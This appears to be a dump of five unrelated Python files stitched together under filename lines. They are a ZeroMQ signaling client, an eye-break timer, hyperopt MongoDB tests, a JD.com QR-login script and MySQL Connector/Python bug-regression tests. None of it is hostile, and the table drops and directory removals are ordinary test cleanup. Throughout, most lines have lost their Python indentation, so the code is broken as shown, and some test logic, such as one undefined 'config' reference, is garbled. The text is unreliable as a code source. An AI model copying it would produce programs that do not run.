SERVER = "tcp://localhost:%s" % PORT
POLL_TIMEOUT = 4000 # ms
POLL_TRIES = 3
def __init__(self):
"""
Initialize the ZMQ socket to talk to the signaling server.
"""
context = zmq.Context()
logger.debug("Connecting to signaling server...")
socket = context.socket(zmq.REQ)
# public, secret = zmq.curve_keypair()
client_keys = zmq.curve_keypair()
socket.curve_publickey = client_keys[0]
socket.curve_secretkey = client_keys[1]
# The client must know the server's public key to make a CURVE
# connection.
public, _ = get_frontend_certificates()
socket.curve_serverkey = public
socket.setsockopt(zmq.RCVTIMEO, 1000)
socket.setsockopt(zmq.LINGER, 0) # Terminate early
socket.connect(self.SERVER)
self._socket = socket
self._signal_queue = Queue.Queue()
self._do_work = threading.Event() # used to stop the worker thread.
self._worker_signaler = threading.Thread(target=self._worker)
def __getattribute__(self, name):
"""
This allows the user to do:
S = Signaler()
S.SOME_SIGNAL
Just by having defined 'some_signal' in _SIGNALS
:param name: the attribute name that is requested.
:type name: str
"""
if name in SIGNALS:
return name
else:
return object.__getattribute__(self, name)
def signal(self, signal, data=None):
"""
Sends a signal to the signaling server.
:param signal: the signal to send.
:type signal: str
"""
if signal not in SIGNALS:
raise Exception("Unknown signal: '{0}'".format(signal))
request = {
'signal': signal,
'data': data,
}
try:
request_json = zmq.utils.jsonapi.dumps(request)
except Exception as e:
msg = ("Error serializing request into JSON.\n"
"Exception: {0} Data: {1}")
msg = msg.format(e, request)
logger.critical(msg)
raise
# queue the call in order to handle the request in a thread safe way.
self._signal_queue.put(request_json)
def _worker(self):
"""
Worker loop that processes the Queue of pending requests to do.
"""
while self._do_work.is_set():
try:
request = self._signal_queue.get(block=False)
self._send_request(request)
except Queue.Empty:
pass
time.sleep(0.01)
logger.debug("Signaler thread stopped.")
def start(self):
"""
Start the Signaler worker.
"""
self._do_work.set()
self._worker_signaler.start()
def stop(self):
"""
Stop the Signaler worker.
"""
self._do_work.clear()
def _send_request(self, request):
"""
Send the given request to the server.
This is used from a thread safe loop in order to avoid sending a
request without receiving a response from a previous one.
:param request: the request to send.
:type request: str
"""
logger.debug("Signaling '{0}'".format(request))
self._socket.send(request)
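        # poll for the REP reply, retrying the poll a few times before giving up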
poll = zmq.Poller()
poll.register(self._socket, zmq.POLLIN)
reply = None
tries = 0
while True:
socks = dict(poll.poll(self.POLL_TIMEOUT))
if socks.get(self._socket) == zmq.POLLIN:
reply = self._socket.recv()
break
tries += 1
if tries < self.POLL_TRIES:
logger.warning('Retrying receive... {0}/{1}'.format(
tries, self.POLL_TRIES))
else:
break
if reply is None:
msg = "Timeout error contacting backend."
logger.critical(msg)
else:
msg = "Received reply for '{0}' -> '{1}'".format(request, reply)
logger.debug(msg)
|
eyeguard.py
|
import schedule
import time
import threading
from playsound import playsound
import sys
minutes = 20
seconds = 20
if len(sys.argv) == 3:
    if int(sys.argv[2]) > seconds:
        seconds = int(sys.argv[2])
    if int(sys.argv[1]) > 2:
        minutes = int(sys.argv[1])
    else:
        minutes = 2
elif len(sys.argv) == 2:
    if int(sys.argv[1]) > 2:
        minutes = int(sys.argv[1])
    else:
        minutes = 2
def sound_alarm():
playsound('E:/files/stdy/Useful Scripts/eye_guard/alarm.mp3')#path to your file
def sound_resume_work_alert():
playsound('E:/files/stdy/Useful Scripts/eye_guard/resume.mp3')#path to your file
def run_threaded(job_func):
job_thread = threading.Thread(target=job_func)
job_thread.start()
if __name__=="__main__":
playsound('E:/files/stdy/Useful Scripts/eye_guard/greeting.mp3') #path to your file
schedule.every(minutes).minutes.do(run_threaded,sound_alarm)
time.sleep(seconds)
schedule.every(minutes).minutes.do(run_threaded,sound_resume_work_alert)
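    # registering the resume job after sleeping offsets it from the alarm, so the "resume work"
    # sound plays that many seconds after each alarm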
while True:
schedule.run_pending()
time.sleep(1)
|
test_mongoexp.py
|
import six.moves.cPickle as pickle
import os
import signal
import subprocess
import sys
import traceback
import threading
import time
import unittest
import numpy as np
import nose
import nose.plugins.skip
from hyperopt.base import JOB_STATE_DONE, STATUS_OK
from hyperopt.mongoexp import parse_url
from hyperopt.mongoexp import MongoTrials
from hyperopt.mongoexp import MongoWorker
from hyperopt.mongoexp import ReserveTimeout
from hyperopt.mongoexp import as_mongo_str
from hyperopt.mongoexp import main_worker_helper
from hyperopt.mongoexp import MongoJobs
from hyperopt.fmin import fmin
from hyperopt import hp, rand
import hyperopt.tests.test_base
from .test_domains import gauss_wave2
def skiptest(f):
def wrapper(*args, **kwargs):
raise nose.plugins.skip.SkipTest()
wrapper.__name__ = f.__name__
return wrapper
class TempMongo:
"""
Context manager for tests requiring a live database.
with TempMongo() as foo:
mj = foo.mongo_jobs('test1')
"""
def __init__(self, workdir="/tmp/hyperopt_test"):
self.workdir = workdir
def __enter__(self):
try:
open(self.workdir)
assert 0
except OSError:
subprocess.call(["mkdir", "-p", "%s/db" % self.workdir])
proc_args = [
"mongod",
"--dbpath=%s/db" % self.workdir,
"--noprealloc",
"--port=22334",
]
print("starting mongod", proc_args)
self.mongo_proc = subprocess.Popen(
proc_args,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
cwd=self.workdir, # this prevented mongod assertion fail
)
try:
interval = 0.125
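                # poll with exponential back-off (a few seconds in total) until mongod accepts connections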
while interval <= 2:
if interval > 0.125:
print("Waiting for mongo to come up")
time.sleep(interval)
interval *= 2
if self.db_up():
break
if self.db_up():
return self
else:
try:
os.kill(self.mongo_proc.pid, signal.SIGTERM)
except OSError:
pass # if it crashed there is no such process
out, err = self.mongo_proc.communicate()
print(out, file=sys.stderr)
print(err, file=sys.stderr)
raise RuntimeError("No database connection", proc_args)
except Exception as e:
try:
os.kill(self.mongo_proc.pid, signal.SIGTERM)
except OSError:
pass # if it crashed there is no such process
raise e
def __exit__(self, *args):
os.kill(self.mongo_proc.pid, signal.SIGTERM)
self.mongo_proc.wait()
subprocess.call(["rm", "-Rf", self.workdir])
@staticmethod
def connection_string(dbname):
return as_mongo_str(f"localhost:22334/{dbname}/jobs")
@staticmethod
def mongo_jobs(dbname):
return MongoJobs.new_from_connection_str(TempMongo.connection_string(dbname))
def db_up(self):
try:
self.mongo_jobs("__test_db")
return True
except: # XXX: don't know what exceptions to put here
return False
def test_parse_url():
uris = [
"mongo://hyperopt:foobar@127.0.0.1:27017/hyperoptdb/jobs",
"mongo://hyperopt:foobar@127.0.0.1:27017/hyperoptdb/jobs?authSource=db1",
]
expected = [
("mongo", "hyperopt", "foobar", "127.0.0.1", 27017, "hyperoptdb", "jobs", None),
(
"mongo",
"hyperopt",
"foobar",
"127.0.0.1",
27017,
"hyperoptdb",
"jobs",
"db1",
),
]
for i, uri in enumerate(uris):
assert parse_url(uri) == expected[i]
# -- If we can't create a TempMongo instance, then
# simply print what happened,
try:
with TempMongo() as temp_mongo:
pass
except OSError as e:
print(e, file=sys.stderr)
print(
("Failed to create a TempMongo context," " skipping all mongo tests."),
file=sys.stderr,
)
if "such file" in str(e):
print("Hint: is mongod executable on path?", file=sys.stderr)
raise nose.SkipTest()
class TestMongoTrials(hyperopt.tests.test_base.TestTrials):
def setUp(self):
self.temp_mongo = TempMongo()
self.temp_mongo.__enter__()
self.trials = MongoTrials(
self.temp_mongo.connection_string("foo"), exp_key=None
)
def tearDown(self, *args):
self.temp_mongo.__exit__(*args)
def with_mongo_trials(f, exp_key=None):
def wrapper():
with TempMongo() as temp_mongo:
trials = MongoTrials(temp_mongo.connection_string("foo"), exp_key=exp_key)
print("Length of trials: ", len(trials.results))
f(trials)
wrapper.__name__ = f.__name__
return wrapper
def _worker_thread_fn(host_id, n_jobs, timeout, dbname="foo", logfilename=None):
mw = MongoWorker(
mj=TempMongo.mongo_jobs(dbname),
logfilename=logfilename,
workdir="mongoexp_test_dir",
)
try:
while n_jobs:
mw.run_one(host_id, timeout, erase_created_workdir=True)
print("worker: %s ran job" % str(host_id))
n_jobs -= 1
except ReserveTimeout:
print("worker timed out:", host_id)
pass
def with_worker_threads(n_threads, dbname="foo", n_jobs=sys.maxsize, timeout=10.0):
"""
Decorator that will run a test with some MongoWorker threads in flight
"""
def newth(ii):
return threading.Thread(
target=_worker_thread_fn, args=(("hostname", ii), n_jobs, timeout, dbname)
)
def deco(f):
def wrapper(*args, **kwargs):
# --start some threads
threads = list(map(newth, list(range(n_threads))))
[th.start() for th in threads]
try:
return f(*args, **kwargs)
finally:
[th.join() for th in threads]
wrapper.__name__ = f.__name__ # -- nose requires test in name
return wrapper
return deco
@with_mongo_trials
def test_with_temp_mongo(trials):
pass # -- just verify that the decorator can run
@with_mongo_trials
def test_new_trial_ids(trials):
a = trials.new_trial_ids(1)
b = trials.new_trial_ids(2)
c = trials.new_trial_ids(3)
assert len(a) == 1
assert len(b) == 2
assert len(c) == 3
s = set()
s.update(a)
s.update(b)
s.update(c)
assert len(s) == 6
@with_mongo_trials
def test_attachments(trials):
blob = b"abcde"
assert "aname" not in trials.attachments
trials.attachments["aname"] = blob
assert "aname" in trials.attachments
assert trials.attachments["aname"] == blob
assert trials.attachments["aname"] == blob
blob2 = b"zzz"
trials.attachments["aname"] = blob2
assert "aname" in trials.attachments
assert trials.attachments["aname"] == blob2
assert trials.attachments["aname"] == blob2
del trials.attachments["aname"]
assert "aname" not in trials.attachments
@with_mongo_trials
def test_delete_all_on_attachments(trials):
trials.attachments["aname"] = "a"
trials.attachments["aname2"] = "b"
assert "aname2" in trials.attachments
trials.delete_all()
assert "aname" not in trials.attachments
assert "aname2" not in trials.attachments
def test_handles_are_independent():
with TempMongo() as tm:
t1 = tm.mongo_jobs("t1")
t2 = tm.mongo_jobs("t2")
assert len(t1) == 0
assert len(t2) == 0
# test that inserting into t1 doesn't affect t2
t1.insert({"a": 7})
assert len(t1) == 1
assert len(t2) == 0
def passthrough(x):
assert os.path.split(os.getcwd()).count("mongoexp_test_dir") == 1, (
"cwd is %s" % os.getcwd()
)
return x
class TestExperimentWithThreads(unittest.TestCase):
@staticmethod
def worker_thread_fn(host_id, n_jobs, timeout):
mw = MongoWorker(
mj=TempMongo.mongo_jobs("foodb"),
logfilename=None,
workdir="mongoexp_test_dir",
)
while n_jobs:
mw.run_one(host_id, timeout, erase_created_workdir=True)
print("worker: %s ran job" % str(host_id))
n_jobs -= 1
@staticmethod
def fmin_thread_fn(space, trials, max_evals, seed):
fmin(
fn=passthrough,
space=space,
algo=rand.suggest,
trials=trials,
rstate=np.random.RandomState(seed),
max_evals=max_evals,
return_argmin=False,
)
def test_seeds_AAB(self):
# launch 3 simultaneous experiments with seeds A, A, B.
# Verify all experiments run to completion.
# Verify first two experiments run identically.
# Verify third experiment runs differently.
exp_keys = ["A0", "A1", "B"]
seeds = [1, 1, 2]
n_workers = 2
jobs_per_thread = 6
# -- total jobs = 2 * 6 = 12
# -- divided by 3 experiments: 4 jobs per fmin
max_evals = (n_workers * jobs_per_thread) // len(exp_keys)
# -- should not matter which domain is used here
domain = gauss_wave2()
pickle.dumps(domain.expr)
pickle.dumps(passthrough)
worker_threads = [
threading.Thread(
target=TestExperimentWithThreads.worker_thread_fn,
args=(("hostname", ii), jobs_per_thread, 30.0),
)
for ii in range(n_workers)
]
with TempMongo() as tm:
mj = tm.mongo_jobs("foodb")
print(mj)
trials_list = [
MongoTrials(tm.connection_string("foodb"), key) for key in exp_keys
]
fmin_threads = [
threading.Thread(
target=TestExperimentWithThreads.fmin_thread_fn,
args=(domain.expr, trials, max_evals, seed),
)
for seed, trials in zip(seeds, trials_list)
]
try:
[th.start() for th in worker_threads + fmin_threads]
finally:
print("joining worker threads...")
[th.join() for th in worker_threads + fmin_threads]
# -- not using an exp_key gives a handle to all the trials
# in foodb
all_trials = MongoTrials(tm.connection_string("foodb"))
self.assertEqual(len(all_trials), n_workers * jobs_per_thread)
# Verify that the fmin calls terminated correctly:
for trials in trials_list:
self.assertEqual(
trials.count_by_state_synced(JOB_STATE_DONE), max_evals
)
self.assertEqual(
trials.count_by_state_unsynced(JOB_STATE_DONE), max_evals
)
self.assertEqual(len(trials), max_evals)
# Verify that the first two experiments match.
# (Do these need sorting by trial id?)
trials_A0, trials_A1, trials_B0 = trials_list
self.assertEqual(
[t["misc"]["vals"] for t in trials_A0.trials],
[t["misc"]["vals"] for t in trials_A1.trials],
)
# Verify that the last experiment does not match.
# (Do these need sorting by trial id?)
self.assertNotEqual(
[t["misc"]["vals"] for t in trials_A0.trials],
[t["misc"]["vals"] for t in trials_B0.trials],
)
def objective_with_attachments(x: float):
"""Objective function that includes extra information as attachments and
dictionary attributes."""
return {
"loss": x ** 2,
"status": STATUS_OK,
"extra_stuff": {"type": None, "value": [0, 1, 2]},
"attachments": {"time": pickle.dumps(time.time)},
}
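# Retrieval sketch (an illustrative assumption, not taken from the original
# test): once a trial has completed, its attachments can typically be read
# back through the trials handle, along the lines of
#
#   blob = trials.trial_attachments(trials.trials[0])["time"]
#   value = pickle.loads(blob)
#
# where trial_attachments() is assumed to be hyperopt's per-trial attachment
# accessor; adjust if the API differs.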
def fmin_thread_fn(space, mongo_trials: MongoTrials, max_evals: int):
fmin(
fn=objective_with_attachments,
space=space,
algo=rand.suggest,
trials=mongo_trials,
rstate=np.random.RandomState(),
max_evals=max_evals,
return_argmin=False,
)
def test_trial_attachments():
exp_key = "A"
with TempMongo() as tm:
mj = tm.mongo_jobs("foo")
trials = MongoTrials(tm.connection_string("foo"), exp_key=exp_key)
space = hp.uniform("x", -10, 10)
max_evals = 3
fmin_thread = threading.Thread(
target=fmin_thread_fn, args=(space, trials, max_evals)
)
fmin_thread.start()
mw = MongoWorker(mj=mj, logfilename=None, workdir="mongoexp_test_dir")
n_jobs = max_evals
while n_jobs:
try:
mw.run_one("hostname", 10.0, erase_created_workdir=True)
print("worker: ran job")
except Exception as exc:
print(f"worker: encountered error : {str(exc)}")
traceback.print_exc()
n_jobs -= 1
fmin_thread.join()
all_trials = MongoTrials(tm.connection_string("foo"))
assert len(all_trials) == max_evals
assert trials.count_by_state_synced(JOB_STATE_DONE) == max_evals
assert trials.count_by_state_unsynced(JOB_STATE_DONE) == max_evals
class FakeOptions:
def __init__(self, **kwargs):
self.__dict__.update(kwargs)
# -- assert that the test raises a ReserveTimeout within 5 seconds
@nose.tools.timed(10.0) # XXX: this needs a suspiciously long timeout
@nose.tools.raises(ReserveTimeout)
@with_mongo_trials
def test_main_worker(trials):
options = FakeOptions(
max_jobs=1,
# XXX: sync this with TempMongo
mongo=as_mongo_str("localhost:22334/foodb"),
reserve_timeout=1,
poll_interval=0.5,
workdir=None,
exp_key="foo",
last_job_timeout=None,
)
# -- check that it runs
# and that the reserve timeout is respected
main_worker_helper(options, ())
|
京东.py
|
# coding:utf-8
from __future__ import absolute_import
try:
from .SDK基类 import Base
except ImportError:
from SDK基类 import Base
from time import time,sleep
from threading import Thread
import json
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
import numpy as np
from io import BytesIO
from Crypto.PublicKey import RSA
class JD(Base):
def __init__(self):
super(JD,self).__init__()
self.headers.update({
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36',
'Referer':'https://passport.jd.com/new/login.aspx?ReturnUrl=https%3A%2F%2Fwww.jd.com%2F'
})
self._rsaString = "A4FDA453C25A775D18C60EF6867ED9B54486CD296B520F9827AF5D10E3ED9E3420C5A088ABA7DB3DF22DC4D2C1448252E54471171351EB2F81618A88A87152B4F4DD340C045416030608C7469D716E162B9FBEE1D3E1C9AB7CD19A8B011D0DFA3BC536FB6A98D47DC2947E1F2E6D23377D79CF4569D11C0232FF7FB3B72E26A5"
def g_tk(self,string:str=None,cookieName:str='wq_skey'):
if not string:
string = self.cookies.get(cookieName,'')
r = 5381
for t in range(len(string)):
r += (r << 5) + ord(string[t])
return 2147483647 & r
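# Worked example for g_tk (added for clarity): with an empty cookie string the
# loop never runs and the method returns 5381; for "a" it returns
# 5381 + (5381 << 5) + ord("a") = 177670. This is a DJB2-style rolling hash
# masked to a signed 31-bit integer, matching the g_tk query parameter sent to
# the wq.jd.com endpoint in the __main__ block below.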
def login(self):
t = int(time()*1000)
url = f'https://qr.m.jd.com/show?appid=133&size=147&t={t}'
img = self.get(url).content
return img
def checkState(self,cookieName:str='wlfstk_smdl',timeout=30):
token = self.cookies.get(cookieName)
def run():
nonlocal timeout
while timeout > 0:
res = self.get(f'https://qr.m.jd.com/check?callback=a&isNewVersion=1&_format_=json&appid=133&token={token}',headers=self.head)
data = json.loads(res.text[2:-1])
if data['code'] == 200:
ticket = data['ticket']
res = self.get(f'https://passport.jd.com/uc/qrCodeTicketValidation?t={ticket}',headers=self.head)
data = json.loads(res.text)
if not data['returnCode']:
print(data['url'])
res = self.get(data['url'],headers=self.head)
break
else:
print(data['msg'])
timeout -= 1
sleep(1)
thr = Thread(target=run)
return thr
if __name__ == '__main__':
jd = JD()
img = jd.login()
plt.imshow(mpimg.imread(BytesIO(img)))
plt.show()
thr = jd.checkState()
thr.start()
thr.join()
res = jd.get(f'https://wq.jd.com/user/info/QueryJDUserInfo?sceneid=80027&sceneval=2&g_login_type=1&g_tk={jd.g_tk()}&g_ty=ls&_format_=json',headers=jd.head)
print(res.text)
|
test_bugs.py
|
# -*- coding: utf-8 -*-
# Copyright (c) 2009, 2020, Oracle and/or its affiliates.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License, version 2.0, as
# published by the Free Software Foundation.
#
# This program is also distributed with certain software (including
# but not limited to OpenSSL) that is licensed under separate terms,
# as designated in a particular file or component or in included license
# documentation. The authors of MySQL hereby grant you an
# additional permission to link the program and your derivative works
# with the separately licensed software that they have included with
# MySQL.
#
# Without limiting anything contained in the foregoing, this file,
# which is part of MySQL Connector/Python, is also subject to the
# Universal FOSS Exception, version 1.0, a copy of which can be found at
# http://oss.oracle.com/licenses/universal-foss-exception.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU General Public License, version 2.0, for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""Test module for bugs
Bug test cases specific to a particular Python (major) version are loaded
from py2.bugs or py3.bugs.
This module was originally located in python2/tests and python3/tests. It
should contain bug test cases which work for both Python v2 and v3.
Whenever a bug is bound to a specific Python version, put the test cases
in tests/py2/bugs.py or tests/py3/bugs.py. It might be that these files need
to be created first.
"""
import io
import os
import gc
import tempfile
from collections import namedtuple
from datetime import date, datetime, timedelta, time
from threading import Thread
import traceback
import time
import unittest
import pickle
import sys
import tests
if tests.SSL_AVAILABLE:
import ssl
from tests import foreach_cnx, cnx_config
from . import PY2
from . import check_tls_versions_support
from mysql.connector import (connection, cursor, conversion, protocol,
errors, constants, pooling)
from mysql.connector.optionfiles import read_option_files
from mysql.connector.pooling import PooledMySQLConnection
from mysql.connector.catch23 import STRING_TYPES
import mysql.connector
try:
from mysql.connector.connection_cext import (CMySQLConnection,
MySQLInterfaceError)
except ImportError:
# Test without C Extension
CMySQLConnection = None
MySQLInterfaceError = None
ERR_NO_CEXT = "C Extension not available"
class Bug437972Tests(tests.MySQLConnectorTests):
def test_windows_tcp_connection(self):
"""lp:437972 TCP connection to Windows"""
if os.name != 'nt':
pass
cnx = None
try:
cnx = connection.MySQLConnection(**tests.get_mysql_config())
except errors.InterfaceError:
self.fail()
if cnx:
cnx.close()
class Bug441430Tests(tests.MySQLConnectorTests):
@foreach_cnx()
def test_execute_return(self):
"""lp:441430 cursor.execute*() should return the cursor.rowcount"""
cur = self.cnx.cursor()
tbl = "buglp44130"
cur.execute("DROP TABLE IF EXISTS %s" % tbl)
cur.execute("CREATE TABLE %s (id INT)" % tbl)
cur.execute("INSERT INTO %s VALUES (%%s),(%%s)" % tbl, (1, 2,))
self.assertEqual(2, cur.rowcount)
stmt = "INSERT INTO %s VALUES (%%s)" % tbl
res = cur.executemany(stmt, [(3,), (4,), (5,), (6,), (7,), (8,)])
self.assertEqual(6, cur.rowcount)
res = cur.execute("UPDATE %s SET id = id + %%s" % tbl, (10,))
self.assertEqual(8, cur.rowcount)
cur.execute("DROP TABLE IF EXISTS {0}".format(tbl))
cur.close()
self.cnx.close()
class Bug454790(tests.MySQLConnectorTests):
"""lp:454790 pyformat / other named parameters broken"""
@foreach_cnx()
def test_pyformat(self):
cur = self.cnx.cursor()
data = {'name': 'Geert', 'year': 1977}
cur.execute("SELECT %(name)s,%(year)s", data)
self.assertEqual(('Geert', 1977), cur.fetchone())
data = [
{'name': 'Geert', 'year': 1977},
{'name': 'Marta', 'year': 1980}
]
cur.executemany("SELECT %(name)s,%(year)s", data)
self.assertEqual(2, cur.rowcount)
cur.close()
self.cnx.close()
class Bug480360(tests.MySQLConnectorTests):
"""lp:480360: fetchall() should return [] when no result"""
@foreach_cnx()
def test_fetchall(self):
cur = self.cnx.cursor()
# Trick to get empty result not needing any table
cur.execute("SELECT * FROM (SELECT 1) AS t WHERE 0 = 1")
self.assertEqual([], cur.fetchall())
cur.close()
self.cnx.close()
@unittest.skipIf(tests.MYSQL_VERSION >= (5, 6, 6),
"Bug380528 not tested with MySQL version >= 5.6.6")
class Bug380528(tests.MySQLConnectorTests):
"""lp:380528: we do not support old passwords"""
@foreach_cnx()
def test_old_password(self):
cur = self.cnx.cursor()
if self.config['unix_socket'] and os.name != 'nt':
user = "'myconnpy'@'localhost'"
else:
user = "'myconnpy'@'%s'" % (config['host'])
try:
cur.execute("GRANT SELECT ON %s.* TO %s" %
(self.config['database'], user))
cur.execute("SET PASSWORD FOR %s = OLD_PASSWORD('fubar')" % (user))
except:
self.fail("Failed executing grant.")
cur.close()
# Test using the newly created user
test_config = self.config.copy()
test_config['user'] = 'myconnpy'
test_config['password'] = 'fubar'
self.assertRaises(errors.NotSupportedError,
self.cnx.__class__, **test_config)
self.cnx = self.cnx.__class__(**self.config)
cur = self.cnx.cursor()
try:
cur.execute("REVOKE SELECT ON %s.* FROM %s" %
(self.config['database'], user))
cur.execute("DROP USER %s" % (user))
except mysql.connector.Error as exc:
self.fail("Failed cleaning up user {0}: {1}".format(user, exc))
cur.close()
class Bug499362(tests.MySQLConnectorTests):
"""lp:499362 Setting character set at connection fails"""
@cnx_config(charset='latin1')
@foreach_cnx()
def test_charset(self):
cur = self.cnx.cursor()
ver = self.cnx.get_server_version()
varlst = ['character_set_client', 'character_set_connection',
'character_set_results']
if ver < (5, 1, 12):
exp1 = [('character_set_client', 'latin1'),
('character_set_connection', 'latin1'),
('character_set_database', 'utf8'),
('character_set_filesystem', 'binary'),
('character_set_results', 'latin1'),
('character_set_server', 'utf8'),
('character_set_system', 'utf8')]
exp2 = [('character_set_client', 'latin2'),
('character_set_connection', 'latin2'),
('character_set_database', 'utf8'),
('character_set_filesystem', 'binary'),
('character_set_results', 'latin2'),
('character_set_server', 'utf8'),
('character_set_system', 'utf8')]
varlst = []
stmt = r"SHOW SESSION VARIABLES LIKE 'character\_set\_%%'"
exp1 = [('CHARACTER_SET_CONNECTION', 'latin1'),
('CHARACTER_SET_CLIENT', 'latin1'),
('CHARACTER_SET_RESULTS', 'latin1')]
exp2 = [('CHARACTER_SET_CONNECTION', 'latin2'),
('CHARACTER_SET_CLIENT', 'latin2'),
('CHARACTER_SET_RESULTS', 'latin2')]
elif ver >= (5, 7, 6):
# INFORMATION_SCHEMA is deprecated
exp1 = [('character_set_client', 'latin1'),
('character_set_connection', 'latin1'),
('character_set_results', 'latin1')]
exp2 = [('character_set_client', 'latin2'),
('character_set_connection', 'latin2'),
('character_set_results', 'latin2')]
stmt = ("SELECT * FROM performance_schema.session_variables "
"WHERE VARIABLE_NAME IN (%s,%s,%s)")
else:
exp1 = [('CHARACTER_SET_CONNECTION', 'latin1'),
('CHARACTER_SET_CLIENT', 'latin1'),
('CHARACTER_SET_RESULTS', 'latin1')]
exp2 = [('CHARACTER_SET_CONNECTION', 'latin2'),
('CHARACTER_SET_CLIENT', 'latin2'),
('CHARACTER_SET_RESULTS', 'latin2')]
stmt = ("SELECT * FROM INFORMATION_SCHEMA.SESSION_VARIABLES "
"WHERE VARIABLE_NAME IN (%s,%s,%s)")
cur.execute(stmt, varlst)
res1 = cur.fetchall()
self.cnx.set_charset_collation('latin2')
cur.execute(stmt, varlst)
res2 = cur.fetchall()
cur.close()
self.cnx.close()
self.assertTrue(tests.cmp_result(exp1, res1))
self.assertTrue(tests.cmp_result(exp2, res2))
class Bug501290(tests.MySQLConnectorTests):
"""lp:501290 Client flags are set to None when connecting"""
def _setup(self):
self.capabilities = self.cnx._handshake['capabilities']
self.default_flags = constants.ClientFlag.get_default()
if self.capabilities & constants.ClientFlag.PLUGIN_AUTH:
self.default_flags |= constants.ClientFlag.PLUGIN_AUTH
@foreach_cnx()
def test_default(self):
self._setup()
flags = constants.ClientFlag.default
for flag in flags:
self.assertTrue(self.cnx._client_flags & flag)
@foreach_cnx()
def test_set_unset(self):
self._setup()
orig = self.cnx._client_flags
exp = self.default_flags | constants.ClientFlag.COMPRESS
if tests.MYSQL_VERSION < (5, 7):
exp = exp & ~constants.ClientFlag.CONNECT_ARGS
self.cnx.set_client_flags([constants.ClientFlag.COMPRESS])
for flag in constants.ClientFlag.default:
self.assertTrue(self.cnx._client_flags & flag)
self.cnx.set_client_flags([-constants.ClientFlag.COMPRESS])
self.assertEqual(self.cnx._client_flags, orig)
@foreach_cnx()
def test_isset_client_flag(self):
self._setup()
flag = constants.ClientFlag.COMPRESS
data = self.default_flags | flag
self.cnx._client_flags = data
self.assertEqual(True, self.cnx.isset_client_flag(flag))
class Bug507466(tests.MySQLConnectorTests):
"""lp:507466 BIT values are not converted correctly to Python"""
def tearDown(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
try:
cur = cnx.cursor()
cur.execute("DROP TABLE IF EXISTS myconnpy_bits")
except:
pass
cnx.close()
@foreach_cnx()
def test_bits(self):
cur = self.cnx.cursor()
cur.execute("DROP TABLE IF EXISTS myconnpy_bits")
cur.execute("""CREATE TABLE `myconnpy_bits` (
`id` int NOT NULL AUTO_INCREMENT,
`c1` bit(8) DEFAULT NULL,
`c2` bit(16) DEFAULT NULL,
`c3` bit(24) DEFAULT NULL,
`c4` bit(32) DEFAULT NULL,
`c5` bit(40) DEFAULT NULL,
`c6` bit(48) DEFAULT NULL,
`c7` bit(56) DEFAULT NULL,
`c8` bit(64) DEFAULT NULL,
PRIMARY KEY (id)
)
""")
insert = """insert into myconnpy_bits (c1,c2,c3,c4,c5,c6,c7,c8)
values (%s,%s,%s,%s,%s,%s,%s,%s)"""
select = "SELECT c1,c2,c3,c4,c5,c6,c7,c8 FROM myconnpy_bits ORDER BY id"
data = []
data.append((0, 0, 0, 0, 0, 0, 0, 0))
data.append((
1 << 7, 1 << 15, 1 << 23, 1 << 31,
1 << 39, 1 << 47, 1 << 55, (1 << 63)-1,
))
cur.executemany(insert, data)
cur.execute(select)
rows = cur.fetchall()
self.assertEqual(rows, data)
self.cnx.close()
class Bug519301(tests.MySQLConnectorTests):
"""lp:519301 Temporary connection failures with 2 exceptions"""
@foreach_cnx()
def test_auth(self):
config = self.config.copy()
config.pop('unix_socket')
config['user'] = 'ham'
config['password'] = 'spam'
for _ in range(1, 100):
try:
cnx = self.cnx.__class__(**config)
except errors.ProgrammingError:
pass
except errors.Error as err:
self.fail("Failing authenticating: {0}".format(str(err)))
except:
raise
else:
cnx.close()
class Bug524668(tests.MySQLConnectorTests):
"""lp:524668 Error in server handshake with latest code"""
def test_handshake(self):
handshake = bytearray(
b'\x47\x00\x00\x00\x0a\x35\x2e\x30\x2e\x33\x30\x2d\x65'
b'\x6e\x74\x65\x72\x70\x72\x69\x73\x65\x2d\x67\x70\x6c'
b'\x2d\x6c\x6f'
b'\x67\x00\x09\x01\x00\x00\x68\x34\x69\x36\x6f\x50\x21\x4f\x00'
b'\x2c\xa2\x08\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00'
b'\x00\x00\x4c\x6e\x67\x39\x26\x50\x44\x40\x57\x72\x59\x48\x00'
)
prtcl = protocol.MySQLProtocol()
try:
prtcl.parse_handshake(handshake)
except:
self.fail("Failed handling handshake")
class Bug571201(tests.MySQLConnectorTests):
"""lp:571201 Problem with more than one statement at a time"""
def setUp(self):
self.tbl = 'Bug571201'
def tearDown(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
try:
cur = cnx.cursor()
cur.execute("DROP TABLE IF EXISTS {0}".format(self.tbl))
except:
pass
cnx.close()
@foreach_cnx()
def test_multistmts(self):
cur = self.cnx.cursor()
cur.execute("DROP TABLE IF EXISTS {0}".format(self.tbl))
cur.execute(("CREATE TABLE {0} ( "
"id INT AUTO_INCREMENT KEY, "
"c1 INT)").format(self.tbl))
stmts = [
"SELECT * FROM %s" % (self.tbl),
"INSERT INTO %s (c1) VALUES (10),(20)" % (self.tbl),
"SELECT * FROM %s" % (self.tbl),
]
result_iter = cur.execute(';'.join(stmts), multi=True)
self.assertEqual(None, next(result_iter).fetchone())
self.assertEqual(2, next(result_iter).rowcount)
exp = [(1, 10), (2, 20)]
self.assertEqual(exp, next(result_iter).fetchall())
self.assertRaises(StopIteration, next, result_iter)
self.cnx.close()
class Bug551533and586003(tests.MySQLConnectorTests):
"""lp: 551533 as 586003: impossible to retrieve big result sets"""
def setUp(self):
self.tbl = 'Bug551533'
def tearDown(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cnx.cmd_query("DROP TABLE IF EXISTS {table}".format(table=self.tbl))
cnx.close()
@cnx_config(connection_timeout=10)
@foreach_cnx()
def test_select(self):
cur = self.cnx.cursor()
